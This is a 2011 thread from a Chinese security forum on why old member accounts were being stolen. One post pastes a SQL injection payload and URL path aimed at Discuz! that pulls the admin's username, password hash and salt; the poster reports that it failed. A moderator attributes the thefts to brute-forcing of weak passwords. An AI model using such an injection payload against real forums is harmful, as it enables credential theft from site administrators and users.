查看: 2724|回复: 6
收起左侧

[软件区] 又一个06年的ID当于茶社陨落,theone老大,到底问题出在哪里?

 关闭 [复制链接]
4534543
发表于 2011-9-20 06:56:33 | 显示全部楼层 |阅读模式
如果确是会员密码被暴力破解,为什么集中在现在爆发呢?
会不会是DZ本身出现问题? QQ截图20110920065318.jpg
wzmlove1121
头像被屏蔽
发表于 2011-9-20 12:36:54 | 显示全部楼层
提供资料:discuz!本身存在漏洞
http://i0day.sinaapp.com/%E6%BC% ... B6%E9%9B%86/46.html
4534543
 楼主| 发表于 2011-9-20 14:07:44 | 显示全部楼层
wzmlove1121 发表于 2011-9-20 12:36
提供资料:discuz!本身存在漏洞
http://i0day.sinaapp.com/%E6%BC%8F%E6%B4%9E%E6%94%B6%E9%9B%86/46.html

a',`subject`=(/*!select*/ concat(username,'|',password,'|',salt) from pre_ucenter_members where uid=1 limit 0,1),comment='

补充内容 (2011-9-20 14:08):
forum.php?mod=misc&tid=1396&action=postappend&pid=12026
4534543
 楼主| 发表于 2011-9-20 14:08:32 | 显示全部楼层
经测试无效…………
边缘vip
发表于 2011-9-21 09:57:41 | 显示全部楼层
从管理后台查询的结果,是同一个登录地点对多个用户名逐个尝试。
也就是我们通常说的暴力破解。

最近不断得到被盗用户的反馈,从结果来看,被破解的都是一些密码简单且没有设置安全提问的帐号。

比如,123456.asdfgh等。所以需要给大家提个醒

http://bbs.kafan.cn/thread-1088472-1-1.html
4534543
 楼主| 发表于 2011-9-21 14:25:49 | 显示全部楼层
边缘vip 发表于 2011-9-21 09:57
从管理后台查询的结果,是同一个登录地点对多个用户名逐个尝试。
也就是我们通常说的暴力破解。

那边缘大大,可否考虑对部分地区实施IP禁止?
而且暴力破解效率不高啊,失败五次就要等待十五分钟
边缘vip
发表于 2011-9-21 14:36:39 | 显示全部楼层
4534543 发表于 2011-9-21 14:25
那边缘大大,可否考虑对部分地区实施IP禁止?
而且暴力破解效率不高啊,失败五次就要等待十五分钟

已启用新的应对机制http://bbs.kafan.cn/thread-1090087-1-1.html
您需要登录后才可以回帖 登录 | 快速注册

本版积分规则

手机版|杀毒软件|软件论坛| 卡饭论坛

Copyright © KaFan  KaFan.cn All Rights Reserved.

Powered by Discuz! X3.4( 沪ICP备2020031077号-2 ) GMT+8, 2024-11-25 15:45 , Processed in 0.127780 second(s), 19 queries .

卡饭网所发布的一切软件、样本、工具、文章等仅限用于学习和研究,不得将上述内容用于商业或者其他非法用途,否则产生的一切后果自负,本站信息来自网络,版权争议问题与本站无关,您必须在下载后的24小时之内从您的电脑中彻底删除上述信息,如有问题请通过邮件与我们联系。

快速回复 客服 返回顶部 返回列表